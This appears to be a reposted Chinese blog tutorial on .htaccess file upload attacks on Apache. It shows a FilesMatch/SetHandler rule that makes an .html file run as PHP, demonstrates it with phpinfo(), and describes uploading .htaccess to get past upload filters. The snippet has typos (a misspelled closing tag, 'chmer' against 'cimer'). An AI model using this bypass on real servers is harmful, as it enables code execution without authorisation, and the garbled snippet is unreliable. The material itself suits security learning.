.htaccess文件上传

时间：2021-05-26 14:33:53 阅读：16 评论：0 收藏：0 [点我收藏+]

taccess文件(或者"分布式配置文件"), 全称是Hypertext Access(超文本入口), 是Apache服务器中的一个配置文件, 负责相关目录下的网页配置, 了针对目录改变配置的方法, 即在一个特定的文档目录中放置一个包含一个或多个指令的文件, 作用于此目录及其所有子目录, 通过.htaccess文件可以实现网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

原理

<FilesMatch "cimer">
Sethandler application/x-httpd-php
</Eilesmatch >

通过.htaccess文件, 调用php的解析器解析一个包含‘chmer‘这个字符串的任意文件

案例

创建.htaccess文件

 <FilesMatch "cimer">
 Sethandler application/x-httpd-php
 </Eilesmatch >

创建cimer.html文件
```
 <?php
 phpinfo();
 ?>
```
直接访问 http://127.0.0.1/cimer.html ，就会出现phpinfo的界面

利用

通过上传 .htaccess 文件, 直接修改解析规则
绕过文件上传漏洞防护

.htaccess文件上传

原文：https://www.cnblogs.com/Frieza/p/14812881.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)